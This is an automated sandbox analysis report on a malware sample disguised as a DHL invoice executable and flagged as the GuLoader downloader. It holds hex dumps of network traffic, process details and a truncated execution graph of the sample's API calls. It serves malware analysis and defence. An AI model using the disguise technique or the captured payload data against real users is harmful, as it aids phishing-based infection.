                                                                          2023-08-10 17:20:52 UTC96INData Raw: 6a d3 fe 06 e5 e5 2d 98 4a 53 c2 c5 58 72 16 9a f6 49 32 0a 37 99 a5 0d f3 d8 2b 03 88 f4 db ad b2 66 b7 3f 40 4e e5 81 80 c6 c3 4a 59 5d 40 4c c5 19 d9 99 8e 30 70 e4 70 26 ca 52 e6 03 f4 04 07 18 b5 5d 6c 4e 49 8e 11 e7 60 35 f4 10 4f d7 d2 3c 52 a8 48 fd 13 9b c9 47 07 09 49 b2 18 30 d5 8a 68 31 cf e2 cb 6b 72 91 71 fa a7 1f fa da 5c 4c 7d fe f5 22 04 7e 56 ce 31 d5 bb 2b a3 33 92 55 19 6f 38 fe 6c 35 58 70 d5 2f b1 2c 96 62 92 c4 bf d9 3d d9 8e 99 b4 88 6e 6d b4 fb aa 0b 72 26 0e a6 be ba 25 6c cf 1e 33 3a ac 0a 83 41 0c 05 79 66 8c 69 65 01 33 74 5f 76 99 2d 38 5b 53 b9 c2 fd 15 06 12 b5 24 5b 83 76 fd 38 b8 70 5d 3f 8f 5d d9 dc bf 2a 3f 43 93 ff 42 86 d8 00 6b c0 36 85 18 1e 63 e5 cf 1b 71 a1 0b 57 20 0d 5f 08 08 00 39 61 7d 40 77 cc 41 be 40 01 5d
                                                                          Data Ascii: j-JSXrI27+f?@NJY]@L0pp&R]lNI`5O<RHGI0h1krq\L}"~V1+3Uo8l5Xp/,b=nmr&%l3:Ayfie3t_v-8[S$[v8p]?]*?CBk6cqW _9a}@wA@]
                                                                          2023-08-10 17:20:52 UTC97INData Raw: 5e c9 0e b0 9a d3 5e 5a 33 93 ff 16 86 bd 41 19 a2 5b e9 71 7b 0d a3 ae 4f 1d f1 5f 57 59 4c 2f 7d 6d 74 39 0e 7d 2d 27 a5 2e c4 32 64 29 4b d0 11 6d 09 1e e8 08 d1 e4 81 71 1f 6e 3b e7 35 ba 9b 49 73 af 6e 15 55 6b 80 7d 39 43 0c 42 0f ce 71 18 dd e3 0f 13 69 bc 68 a2 9d af 9f 00 68 2b 33 4b 39 81 38 53 ce 18 5f 5f c8 b2
                                                                          Data Ascii: ^^Z3A[q{O_WYL/}mt9}-'.2d)Kmqn;5IsnUk}9CBqihh+3K98S__
                                                                          2023-08-10 17:20:52 UTC98INData Raw: 8c e4 6e 1a 9d 40 3e 17 9b 44 fe fa 82 27 d9 06 d9 ff 50 ca eb c3 c2 e9 db 0f 67 14 d3 9c 8d 7f 4a 7d d1 9a 70 77 65 cf b1 9d 13 c4 46 e3 15 7d 34 72 bd 91 38 ad e5 bd b8 d2 ad 3e c6 88 50 d7 05 d1 2e 1a a0 0a eb c9 95 1d f5 c9 a7 bf 47 e3 48 82 73 da ed 1a 6c 70 bf ff 37 85 ed fb ca 5f 57 9f 00 a7 d2 cf 9e 7b b8 0a 8d e5 3b d5 7a e4 f0 1d 1c 55 f9 56 5c 48 f2 db 6a 7d 90 10 0f 54 35 61 de 86 20 9d 57 e6 5e 46 b0 b0 f9 3f 0e 55 fc b2 9c a9 47 38 dc a7 14 28 38 0f 71 4d 6b 24 0f 0b 6a 5a 7e 95 b6 39 72 32 e0 03 40 b2 f5 d5 45 aa da eb 7c bc c4 e3 5b dd e8 f5 5f 67 50 38 af 0b 39 71 c1 76 ab 7b d9 9c 41 e0 12 32 8d 87 f2 a0 fe 92 37 eb 7e e2 ec 34 8c 62 7c cb 65 62 e3 8a 55 f2 1d bb 7d 58 f7 9b b7 2a f8 ac 0a 11 5a 95 99 95 75 08 b3 7b c5 c9 b4 20 25 21 50
                                                                          Data Ascii: n@>D'PgJ}pweF}4r8>P.GHslp7_W{;zUV\Hj}T5a W^F?UG8(8qMk$jZ~9r2@E|[_gP89qv{A27~4b|ebU}X*Zu{ %!P
                                                                          2023-08-10 17:20:52 UTC99INData Raw: ed b8 fb 56 88 08 90 83 5b fe 11 15 a4 11 04 86 fe 26 ae 33 f8 19 2a 96 fe c3 4e f8 c9 0a 7f 1c e1 ca fc 25 69 c1 17 aa ba c0 20 4a 21 33 99 c8 95 b4 53 71 c3 7c 42 50 45 31 21 2d 27 ee b9 ac 27 0c c6 2f 2f b1 3c 42 4e 6f 5d 0d 2a 5f 34 49 8a 0c 08 1f 06 69 27 e4 a4 2b b5 36 ea c0 ce 65 9d 89 19 60 f0 37 20 ef d6 73 ad 4c 2d 95 10 5a c0 ed ea 06 c4 08 1e 0b 67 f4 8e 19 1c 1b 90 55 2f ae a3 bc f1 09 78 b6 0d 44 8f aa 5b 8f 7a d5 ee 87 7a 9b 2a d0 ec 2d 39 4d 7c af 5e 89 e2 30 b4 47 4f 23 f6 45 3a 83 e3 a2 81 b1 79 0b a3 2f 6f 8e 64 49 09 b6 be c1 d1 39 2c 97 a0 4b 75 cc f2 07 6c bd 8d b3 f4 87 20 4e c3 a4 31 e7 52 ee 6b 61 02 8f aa 5a 80 d2 47 a2 4b bb 52 b3 37 32 3d e9 48 82 b1 2a cb b0 9e 6d de ae 44 0b 28 15 61 6a c0 57 0b 25 b1 02 f9 8a 6d 58 63 b7 b8
                                                                          Data Ascii: V[&3*N%i J!3Sq|BPE1!-''//<BNo]*_4Ii'+6e`7 sL-ZgU/xD[zz*-9M|^0GO#E:y/odI9,Kul N1RkaZGKR72=H*mD(ajW%mXc
                                                                          2023-08-10 17:20:52 UTC100INData Raw: 3c 64 17 3a 72 5c ca 41 ba 90 ba ee 93 e5 8f 17 8a 9d 31 38 e1 7a a4 81 ac 68 fb e1 8e 97 f8 52 df 78 d1 a9 8b b6 26 cd 2b 6d 31 ed 6b b1 72 4f 9a 7a 50 61 ab 40 31 98 a6 2e ea 22 10 64 4e dd 44 8f 74 de 11 4b 8c 7d 15 1f aa bf 54 be 23 9f d4 23 be ca 22 dd 36 91 cc 0e 8d c0 00 b5 e0 85 f2 37 df 39 b0 39 15 06 30 e6 8e 69 cd c7 14 b5 a1 8d b9 14 60 db a8 11 0b c0 72 6e 89 62 16 78 64 db 48 0f be 19 50 20 2c b5 05 50 17 cb cc fa a5 af 3d 51 d9 ff ed b7 d6 97 36 f3 16 fc 71 c9 78 b8 bf 04 a2 dc cb f4 54 d8 d3 65 5f 7d ed 8c 92 3c cb b7 b3 7f 46 2e bc 5c 70 35 71 ad 9c 01 b3 6a d3 ac d2 e3 1e 72 10 22 28 83 90 09 05 d2 76 64 42 e4 ca 9a 4d a5 b7 a6 fd 18 3c 33 65 a2 8e da f6 15 13 b1 c5 72 f6 cf c0 25 a2 47 e1 65 65 73 9d e3 9d 89 07 c3 bf c2 b5 f9 ab ee 4a
                                                                          Data Ascii: <d:r\A18zhRx&+m1krOzPa@1."dNDtK}T##"67990i`rnbxdHP ,P=Q6qxTe_}<F.\p5qjr"(vdBM<3er%GeesJ
                                                                          2023-08-10 17:20:52 UTC101INData Raw: 68 8b c1 7f f2 1a 16 32 c9 dd 11 e8 55 dc 3d 6a bb 38 1b ea 6f 9b ea 3f 16 e9 07 3a 97 51 d1 cd a4 5a f4 a0 3a 5e 42 b2 76 9b c2 f7 53 fd 36 54 42 3e 34 0e c2 d2 15 2f 62 69 9e 05 d5 ef 6d f6 68 9b 8b e0 05 c9 cb 15 c3 22 f4 c7 9b 33 f8 93 fd 21 76 50 9f 6e bf 6c 61 00 8c fe cd ec 99 eb 3f 68 38 6a bf fe 28 e5 83 2d eb 4a 3a c2 c5 58 72 16 9a f6 49 32 2f 37 ea a5 51 f3 f6 2b 60 88 9b db c3 b2 00 b7 56 40 29 e5 dd 80 a0 c3 3f 59 31 40 20 c5 6a d9 e0 8e 5e 70 87 70 7a ca 22 e6 71 f4 6b 07 7e b5 34 6c 22 49 eb 11 94 60 1b f4 68 4f ba d2 50 52 a8 48 fd 13 be c9 34 07 55 49 f6 18 55 d5 e6 68 44 cf 9a cb 0e 72 d7 71 ae a7 4f fa 86 5c 3f 7d 97 f5 56 04 1b 56 bd 31 fb bb 53 a3 5e 92 39 19 6f 38 fe 6c 35 58 70 d5 0a b1 5f 96 3e 92 83 bf b6 3d 9f 8e cd b4 d8 6e 31
                                                                          Data Ascii: h2U=j8o?:QZ:^BvS6TB>4/bimh"3!vPnla?h8j(-J:XrI2/7Q+`V@)?Y1@ j^ppz"qk~4l"I`hOPRH4UIUhDrqO\?}VV1S^9o8l5Xp_>=n1
                                                                          2023-08-10 17:20:52 UTC102INData Raw: fa 86 5c 3f 7d 97 f5 56 04 1b 56 bd 31 fb bb 53 a3 5e 92 39 19 6f 38 fe 6c 35 58 70 d5 0a b1 5f 96 3e 92 83 bf b6 3d 9f 8e cd b4 d8 6e 31 b4 88 aa 6e 72 52 0e d2 be d3 25 02 cf 79 33 49 ac 56 83 02 0c 6a 79 08 8c 07 65 64 33 17 5f 02 99 44 38 34 53 d7 c2 8e 15 28 12 c1 24 23 83 02 fd 38 b8 3a 5d 5e 8f 0e d9 9a bf 5e 3f 33 93 ff 42 86 d8 41 6b a2 36 e9 18 7b 63 a3 cf 4f 71 f1 0b 57 20 4c 5f 7d 08 74 39 0e 7d 2d 77 a5 41 c4 40 64 5d 4b 9e 11 18 09 73 e8 6a d1 81 81 03 1f 6e 3b e7 35 e9 9b 26 73 c9 6e 61 55 1c 80 1c 39 31 0c 27 0f 92 71 21 dd 81 0f 7a 69 cf 68 8c 9d cc 9f 6f 68 46 33 17 39 ca 38 3a ce 4c 5f 0b c8 eb 8c b8 6e 49 9d 25 3e 64 9b 37 fe 93 82 48 d9 68 d9 8c 50 ca eb c3 c2 e9 db 0f 67 47 d3 f3 8d 19 4a 09 d1 ed 70 16 65 bd b1 f8 13 98 46 b0 15 14
                                                                          Data Ascii: \?}VV1S^9o8l5Xp_>=n1nrR%y3IVjyed3_D84S($#8:]^^?3BAk6{cOqW L_}t9}-wA@d]Ksjn;5&snaU91'q!zihohF398:L_nI%>d7HhPgGJpeF
                                                                          2023-08-10 17:20:52 UTC104INData Raw: 6e 49 9d 25 3e 64 9b 37 fe 93 82 48 d9 68 d9 8c 50 ca eb c3 c2 e9 db 0f 67 47 d3 f3 8d 19 4a 09 d1 ed 70 16 65 bd b1 f8 13 98 46 b0 15 14 34 1f bd fe 38 c3 e5 e9 b8 b3 ad 4a c6 e0 50 b6 05 bc 2e 46 a0 5a eb bc 95 49 f5 9d a7 e6 47 bf 48 d1 73 bf ed 69 6c 03 bf 96 37 ea ed 95 ca 2c 57 9f 00 f8 d2 ab 9e 1e b8 69 8d e5 3b d5 7a c1 f0 6e 1c 0a f9 32 5c 2d f2 b8 6a 7d 90 10 0f 38 35 12 de e7 20 ee 57 94 5e 30 b0 9e f9 5b 0e 39 fc de 9c a9 47 38 dc eb 67 49 71 4c 03 34 1b 50 5a 65 1a 28 11 e1 d3 5a 06 76 81 77 21 b2 f5 b9 45 d9 da 8a 7c cf c4 90 5b f3 e8 90 5f 1f 50 5d af 0b 39 1d c1 15 ab 10 d9 9c 41 c5 12 41 8d db f2 ed fe fb 37 88 7e 90 ec 5b 8c 11 7c a4 65 04 e3 fe 55 ae 1d f8 7d 2a f7 fe b7 4e f8 c9 0a 7f 5a e1 99 fc 75 69 b3 17 c5 ba b4 20 25 21 50 99 a7
                                                                          Data Ascii: nI%>d7HhPgGJpeF48JP.FZIGHsil7,Wi;zn2\-j}85 W^0[9G8gIqL4PZe(Zvw!E|[_P]9AA7~[|eU}*NZui %!P
                                                                          2023-08-10 17:20:52 UTC105INData Raw: fb 37 88 7e 90 ec 5b 8c 11 7c a4 65 04 e3 fe 55 ae 1d f8 7d 2a f7 fe b7 4e f8 c9 0a 7f 5a e1 99 fc 75 69 b3 17 c5 ba b4 20 25 21 50 99 a7 95 d8 53 71 c3 7c 42 03 45 5e 21 4b 27 9a b9 db 27 6d c6 5d 2f d4 3c 1e 4e 22 5d 6c 2a 2d 34 3d 8a 65 08 71 06 49 27 b4 a4 59 b5 5f ea ab ce 17 9d f0 19 0c f0 37 20 ca d6 00 ad 10 2d c2 10 09 c0 b2 ea 40 c4 5c 1e 5b 67 a8 8e 4e 1c 48 90 0a 2f e8 a3 e8 f1 59 78 98 0d 0d 8f e4 5b c6 7a d5 ee 87 7a be 2a a3 ec 71 39 1a 7c fc 5e d6 e2 76 b4 13 4f 73 f6 6b 3a ca e3 ec 81 f8 79 0b a3 0a 6f fd 64 15 09 ff be b1 d1 4a 2c e0 a0 22 75 b8 f2 64 6c d5 8d b3 f4 f0 20 3d c3 fb 31 81 52 9a 6b 11 02 a1 aa 33 80 bc 47 cb 4b bb 52 b3 37 17 3d 9a 48 de b1 64 cb d5 9e 19 de fd 44 6a 28 67 61 0b c0 39 0b 42 b1 5e f9 d2 6d 3e 63 c3 b8 e4 57
                                                                          Data Ascii: 7~[|eU}*NZui %!PSq|BE^!K''m]/<N"]l*-4=eqI'Y_7 -@\[gNH/Yx[zz*q9|^vOsk:yodJ,"udl =1Rk3GKR7=HdDj(ga9B^m>cW
                                                                          2023-08-10 17:20:52 UTC106INData Raw: a1 aa 33 80 bc 47 cb 4b bb 52 b3 37 17 3d 9a 48 de b1 64 cb d5 9e 19 de fd 44 6a 28 67 61 0b c0 39 0b 42 b1 5e f9 d2 6d 3e 63 c3 b8 e4 57 02 74 b1 da a6 2a 4e b5 9b 43 e2 b5 7c 00 df dc 18 ec 92 2a 40 20 e7 1f 74 73 b6 67 64 db a6 d1 d4 41 4c 27 b7 db 5a ea 69 0f 96 01 f4 bd 62 d2 36 38 2a ff 69 89 70 56 d9 51 9c 83 75 79 9f c9 29 34 45 cb 7d 06 ca 58 26 1a 67 9d f5 b1 9a 1d 28 0f b3 57 df ab 1d ee 7d 00 3f 24 17 77 6f 18 95 14 e9 10 7c 20 a7 60 43 4f 0b 9e d2 2d d5 32 8c 6e 6c 6e 4b b5 88 08 8d b6 e7 23 d7 1a 40 5c 2a 5c 11 c4 9e 7b 02 cb a1 5f 43 6a 3d a7 36 c8 cf 67 0e 90 a3 e6 4e d8 51 20 0f 93 80 02 bb 54 56 68 8b c1 7f f2 1a 16 32 c9 dd 11 e8 55 dc 3d 6a bb 38 1b ea 6f 9b ea 3f 16 e9 07 3a 97 51 d1 cd a4 5a f4 a0 3a 5e 42 b2 76 9b c2 f7 53 fd 36 54
                                                                          Data Ascii: 3GKR7=HdDj(ga9B^m>cWt*NC|*@ tsgdAL'Zib68*ipVQuy)4E}X&g(W}?$wo| `CO-2nlnK#@\*\{_Cj=6gNQ TVh2U=j8o?:QZ:^BvS6T
                                                                          2023-08-10 17:20:52 UTC107INData Raw: c1 7f f2 1a 16 32 c9 dd 11 e8 55 dc 3d 6a bb 38 1b ea 6f 9b ea 3f 16 e9 07 3a 97 51 d1 cd a4 5a f4 a0 3a 5e 42 b2 76 9b c2 f7 53 fd 36 54 42 3e 34 0e c2 d2 15 2f 62 69 9e 05 d5 ef 6d f6 68 9b 8b e0 05 c9 cb 15 c3 22 f4 c7 9b 33 f8 93 fd 21 76 50 9f 6e bf 6c 61 00 8c fe cd ec 99 eb 3f 68 38 6a bf fe 28 e5 83 2d eb 4a 3a c2 c5 58 72 16 9a f6 49 32 2f 37 ea a5 51 f3 f6 2b 60 88 9b db c3 b2 00 b7 56 40 29 e5 dd 80 a0 c3 3f 59 31 40 20 c5 6a d9 e0 8e 5e 70 87 70 7a ca 22 e6 71 f4 6b 07 7e b5 34 6c 22 49 eb 11 94 60 1b f4 68 4f ba d2 50 52 a8 48 fd 13 be c9 34 07 55 49 f6 18 55 d5 e6 68 44 cf 9a cb 0e 72 d7 71 ae a7 4f fa 86 5c 3f 7d 97 f5 56 04 1b 56 bd 31 fb bb 53 a3 5e 92 39 19 6f 38 fe 6c 35 58 70 d5 0a b1 5f 96 3e 92 83 bf b6 3d 9f 8e cd b4 d8 6e 31 b4 88
                                                                          Data Ascii: 2U=j8o?:QZ:^BvS6TB>4/bimh"3!vPnla?h8j(-J:XrI2/7Q+`V@)?Y1@ j^ppz"qk~4l"I`hOPRH4UIUhDrqO\?}VV1S^9o8l5Xp_>=n1
                                                                          2023-08-10 17:20:52 UTC109INData Raw: 5c 3f 7d 97 f5 56 04 1b 56 bd 31 fb bb 53 a3 5e 92 39 19 6f 38 fe 6c 35 58 70 d5 0a b1 5f 96 3e 92 83 bf b6 3d 9f 8e cd b4 d8 6e 31 b4 88 aa 6e 72 52 0e d2 be d3 25 02 cf 79 33 49 ac 56 83 02 0c 6a 79 08 8c 07 65 64 33 17 5f 02 99 44 38 34 53 d7 c2 8e 15 28 12 c1 24 23 83 02 fd 38 b8 3a 5d 5e 8f 0e d9 9a bf 5e 3f 33 93 ff 42 86 d8 41 6b a2 36 e9 18 7b 63 a3 cf 4f 71 f1 0b 57 20 4c 5f 7d 08 74 39 0e 7d 2d 77 a5 41 c4 40 64 5d 4b 9e 11 18 09 73 e8 6a d1 81 81 03 1f 6e 3b e7 35 e9 9b 26 73 c9 6e 61 55 1c 80 1c 39 31 0c 27 0f 92 71 21 dd 81 0f 7a 69 cf 68 8c 9d cc 9f 6f 68 46 33 17 39 ca 38 3a ce 4c 5f 0b c8 eb 8c b8 6e 49 9d 25 3e 64 9b 37 fe 93 82 48 d9 68 d9 8c 50 ca eb c3 c2 e9 db 0f 67 47 d3 f3 8d 19 4a 09 d1 ed 70 16 65 bd b1 f8 13 98 46 b0 15 14 34 1f
                                                                          Data Ascii: \?}VV1S^9o8l5Xp_>=n1nrR%y3IVjyed3_D84S($#8:]^^?3BAk6{cOqW L_}t9}-wA@d]Ksjn;5&snaU91'q!zihohF398:L_nI%>d7HhPgGJpeF4
                                                                          2023-08-10 17:20:52 UTC110INData Raw: 9d 25 3e 64 9b 37 fe 93 82 48 d9 68 d9 8c 50 ca eb c3 c2 e9 db 0f 67 47 d3 f3 8d 19 4a 09 d1 ed 70 16 65 bd b1 f8 13 98 46 b0 15 14 34 1f bd fe 38 c3 e5 e9 b8 b3 ad 4a c6 e0 50 b6 05 bc 2e 46 a0 5a eb bc 95 49 f5 9d a7 e6 47 bf 48 d1 73 bf ed 69 6c 03 bf 96 37 ea ed 95 ca 2c 57 9f 00 f8 d2 ab 9e 1e b8 69 8d e5 3b d5 7a c1 f0 6e 1c 0a f9 32 5c 2d f2 b8 6a 7d 90 10 0f 38 35 12 de e7 20 ee 57 94 5e 30 b0 9e f9 5b 0e 39 fc de 9c a9 47 38 dc eb 67 49 71 4c 03 34 1b 50 5a 65 1a 28 11 e1 d3 5a 06 76 81 77 21 b2 f5 b9 45 d9 da 8a 7c cf c4 90 5b f3 e8 90 5f 1f 50 5d af 0b 39 1d c1 15 ab 10 d9 9c 41 c5 12 41 8d db f2 ed fe fb 37 88 7e 90 ec 5b 8c 11 7c a4 65 04 e3 fe 55 ae 1d f8 7d 2a f7 fe b7 4e f8 c9 0a 7f 5a e1 99 fc 75 69 b3 17 c5 ba b4 20 25 21 50 99 a7 95 d8
                                                                          Data Ascii: %>d7HhPgGJpeF48JP.FZIGHsil7,Wi;zn2\-j}85 W^0[9G8gIqL4PZe(Zvw!E|[_P]9AA7~[|eU}*NZui %!P


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:19:20:22
                                                                          Start date:10/08/2023
                                                                          Path:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          Imagebase:0x400000
                                                                          File size:641'696 bytes
                                                                          MD5 hash:C15B81D99F8367B4C4E8B4C2244F3DF6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1084543933.00000000047F5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:19:20:40
                                                                          Start date:10/08/2023
                                                                          Path:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          Imagebase:0x400000
                                                                          File size:641'696 bytes
                                                                          MD5 hash:C15B81D99F8367B4C4E8B4C2244F3DF6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:20.5%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:19.4%
                                                                            Total number of Nodes:1553
                                                                            Total number of Limit Nodes:40
                                                                            execution_graph 4923 401c41 4924 403002 16 API calls 4923->4924 4925 401c4a 4924->4925 4926 403002 16 API calls 4925->4926 4927 401c53 4926->4927 4930 40661f wsprintfW 4927->4930 4929 401cdb 4930->4929 4931 4024c2 4932 40303e 16 API calls 4931->4932 4933 4024c8 4932->4933 4934 40303e 16 API calls 4933->4934 4935 4024d1 4934->4935 4936 40303e 16 API calls 4935->4936 4937 4024da 4936->4937 4938 4065cf 2 API calls 4937->4938 4939 4024e2 4938->4939 4940 4024f3 lstrlenW lstrlenW 4939->4940 4942 405d3a 23 API calls 4939->4942 4944 402ea1 4939->4944 4941 405d3a 23 API calls 4940->4941 4943 40253a SHFileOperationW 4941->4943 4942->4939 4943->4939 4943->4944 4945 402b42 4946 402b48 4945->4946 4947 402b50 FindNextFileW 4946->4947 4948 4018be 4946->4948 4947->4948 4949 402048 4950 403002 16 API calls 4949->4950 4951 40204e 4950->4951 4952 403002 16 API calls 4951->4952 4953 402057 4952->4953 4954 402061 ShowWindow 4953->4954 4955 40206c EnableWindow 4953->4955 4956 402ea1 4954->4956 4955->4956 4957 403d48 4958 403d53 4957->4958 4959 403d57 4958->4959 4960 403d5a GlobalAlloc 4958->4960 4960->4959 4961 401ecc 4962 403002 16 API calls 4961->4962 4963 401eda SetWindowLongW 4962->4963 4964 402ea1 4963->4964 4965 40364f 4966 403661 SetTimer 4965->4966 4967 403675 4965->4967 4968 40367e MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4966->4968 4967->4968 4969 4036cc 4967->4969 4968->4969 4970 40234f 4971 40303e 16 API calls 4970->4971 4972 402356 4971->4972 4973 40303e 16 API calls 4972->4973 4974 402361 4973->4974 4975 40303e 16 API calls 4974->4975 4976 40236e 4975->4976 4977 40303e 16 API calls 4976->4977 4978 402379 4977->4978 4979 40303e 16 API calls 4978->4979 4981 402384 4979->4981 4980 4023c4 CoCreateInstance 4985 4023e8 4980->4985 4981->4980 4982 40303e 16 API calls 4981->4982 4982->4980 4983 405d3a 23 API calls 4984 4024ba 4983->4984 4985->4983 4986 4058d0 4987 4058e5 4986->4987 4988 4058f9 4986->4988 4989 4058eb 4987->4989 4990 40593e CallWindowProcW 4987->4990 4991 405901 IsWindowVisible 4988->4991 4994 405918 4988->4994 4992 4054e8 SendMessageW 4989->4992 4995 4058f5 4990->4995 4991->4990 4993 40590e 4991->4993 4992->4995 4998 4056da SendMessageW 4993->4998 4994->4990 5003 4054b6 4994->5003 4999 405739 SendMessageW 4998->4999 5000 4056fb GetMessagePos ScreenToClient SendMessageW 4998->5000 5001 405731 4999->5001 5000->5001 5002 405736 5000->5002 5001->4994 5002->4999 5012 406b1a lstrcpynW 5003->5012 5005 4054c9 5013 40661f wsprintfW 5005->5013 5007 4054d3 5008 401533 89 API calls 5007->5008 5009 4054dc 5008->5009 5014 406b1a lstrcpynW 5009->5014 5011 4054e3 5011->4990 5012->5005 5013->5007 5014->5011 5015 402dd1 5016 402df2 5015->5016 5017 402dd9 5015->5017 5018 4068e6 5 API calls 5016->5018 5020 403002 16 API calls 5017->5020 5021 402e72 5017->5021 5019 402e2a 5018->5019 5022 40303e 16 API calls 5019->5022 5023 402de9 5020->5023 5024 402e33 5022->5024 5025 403002 16 API calls 5023->5025 5024->5021 5026 402e37 IIDFromString 5024->5026 5025->5016 5026->5021 5027 402e47 5026->5027 5027->5021 5030 406b1a lstrcpynW 5027->5030 5029 402e66 CoTaskMemFree 5029->5021 5030->5029 5031 405655 lstrcpynW lstrlenW 4516 402656 4517 40303e 16 API calls 4516->4517 4518 40266d 4517->4518 4519 40303e 16 API calls 4518->4519 4520 402678 4519->4520 4535 4062a5 4520->4535 4523 402ea5 4524 4026d1 4527 4026e7 4524->4527 4528 4026d8 4524->4528 4525 4026bb 4526 40303e 16 API calls 4525->4526 4531 4026c2 lstrlenW 4526->4531 4530 402700 RegSetValueExW 4527->4530 4533 403148 30 API calls 4527->4533 4529 403002 16 API calls 4528->4529 4532 4026df 4529->4532 4534 40271c RegCloseKey 4530->4534 4531->4530 4532->4530 4533->4532 4534->4523 4536 4062b4 4535->4536 4537 4062bd RegCreateKeyExW 4536->4537 4538 402697 4536->4538 4537->4538 4538->4523 4538->4524 4538->4525 5032 6f1c1b0a 5033 6f1c1b38 5032->5033 5034 6f1c2351 21 API calls 5033->5034 5035 6f1c1b3f 5034->5035 5036 6f1c1b46 5035->5036 5037 6f1c1b52 5035->5037 5040 6f1c15eb 2 API calls 5036->5040 5038 6f1c1b5c 5037->5038 5039 6f1c1b73 5037->5039 5041 6f1c15c5 3 API calls 5038->5041 5042 6f1c1b9f 5039->5042 5043 6f1c1b79 5039->5043 5044 6f1c1b50 5040->5044 5046 6f1c1b61 5041->5046 5045 6f1c15c5 3 API calls 5042->5045 5047 6f1c1668 3 API calls 5043->5047 5045->5044 5048 6f1c1668 3 API calls 5046->5048 5049 6f1c1b7e 5047->5049 5050 6f1c1b67 5048->5050 5051 6f1c15eb 2 API calls 5049->5051 5052 6f1c15eb 2 API calls 5050->5052 5053 6f1c1b84 GlobalFree 5051->5053 5054 6f1c1b6d GlobalFree 5052->5054 5053->5044 5053->5054 5056 6f1c1000 5059 6f1c101b 5056->5059 5066 6f1c156c 5059->5066 5061 6f1c1020 5062 6f1c1024 GlobalAlloc 5061->5062 5063 6f1c1032 5061->5063 5062->5063 5064 6f1c15c5 3 API calls 5063->5064 5065 6f1c1019 5064->5065 5068 6f1c1572 5066->5068 5067 6f1c1578 5067->5061 5068->5067 5069 6f1c1584 GlobalFree 5068->5069 5069->5061 4867 40225d 4868 402335 4867->4868 4869 40226e 4867->4869 4871 405d3a 23 API calls 4868->4871 4870 40303e 16 API calls 4869->4870 4872 402275 4870->4872 4877 40234a 4871->4877 4873 40303e 16 API calls 4872->4873 4874 402281 4873->4874 4875 40228b GetModuleHandleW 4874->4875 4876 40229c LoadLibraryExW 4874->4876 4878 4022b0 4875->4878 4879 402298 4875->4879 4876->4868 4876->4878 4888 406269 4878->4888 4879->4876 4882 4022c4 4885 405d3a 23 API calls 4882->4885 4886 4022da 4882->4886 4883 402306 4884 405d3a 23 API calls 4883->4884 4884->4886 4885->4886 4886->4877 4887 402329 FreeLibrary 4886->4887 4887->4877 4893 406469 WideCharToMultiByte 4888->4893 4890 406286 4891 40628d GetProcAddress 4890->4891 4892 4022ba 4890->4892 4891->4892 4892->4882 4892->4883 4893->4890 5070 402cde 5071 403002 16 API calls 5070->5071 5073 402b21 5071->5073 5072 402d10 5074 402d35 5072->5074 5075 402d25 5072->5075 5073->5070 5073->5072 5078 401709 5073->5078 5077 405eba 16 API calls 5074->5077 5076 403002 16 API calls 5075->5076 5076->5078 5077->5078 5079 40285f 5080 402883 5079->5080 5081 402899 5079->5081 5082 403002 16 API calls 5080->5082 5083 4028c3 5081->5083 5084 40289e 5081->5084 5093 402889 5082->5093 5086 40303e 16 API calls 5083->5086 5085 40303e 16 API calls 5084->5085 5087 4028a5 5085->5087 5088 4028ca lstrlenW 5086->5088 5096 406469 WideCharToMultiByte 5087->5096 5088->5093 5090 4028b5 lstrlenA 5090->5093 5091 4028fc 5092 406a0b WriteFile 5091->5092 5094 402910 5091->5094 5092->5094 5093->5091 5093->5094 5097 406484 SetFilePointer 5093->5097 5096->5090 5098 4064a0 5097->5098 5099 4064bb 5097->5099 5100 406948 ReadFile 5098->5100 5099->5091 5101 4064ac 5100->5101 5101->5099 5102 4064c4 SetFilePointer 5101->5102 5103 4064ec SetFilePointer 5101->5103 5102->5103 5104 4064cf 5102->5104 5103->5099 5105 406a0b WriteFile 5104->5105 5105->5099 5106 401ce0 5107 40303e 16 API calls 5106->5107 5108 401ce7 5107->5108 5109 403002 16 API calls 5108->5109 5110 401cf0 wsprintfW 5109->5110 5111 402ea1 5110->5111 5112 6f1c2ebf 5113 6f1c2ed7 5112->5113 5114 6f1c1309 2 API calls 5113->5114 5115 6f1c2ef2 5114->5115 3899 402566 3900 402574 3899->3900 3901 40256e 3899->3901 3903 402585 3900->3903 3904 40303e 16 API calls 3900->3904 3902 40303e 16 API calls 3901->3902 3902->3900 3905 40303e 16 API calls 3903->3905 3908 402594 3903->3908 3904->3903 3905->3908 3909 40303e 3908->3909 3910 405eba 16 API calls 3909->3910 3911 403067 3910->3911 3912 40259d WritePrivateProfileStringW 3911->3912 3914 406d3d 3911->3914 3921 406d52 3914->3921 3915 406dd4 3916 406ddc CharPrevW 3915->3916 3918 406dfc 3915->3918 3916->3915 3917 406dc5 CharNextW 3917->3915 3917->3921 3918->3912 3920 406db1 CharNextW 3920->3921 3921->3915 3921->3917 3921->3920 3922 406dc0 CharNextW 3921->3922 3923 4065f6 3921->3923 3922->3917 3924 406602 3923->3924 3925 40661c 3923->3925 3924->3925 3926 40660b CharNextW 3924->3926 3925->3921 3926->3924 3926->3925 5116 6f1c103a 5117 6f1c1052 5116->5117 5118 6f1c10c5 5117->5118 5119 6f1c1081 5117->5119 5120 6f1c1061 5117->5120 5121 6f1c156c GlobalFree 5119->5121 5122 6f1c156c GlobalFree 5120->5122 5127 6f1c1079 5121->5127 5123 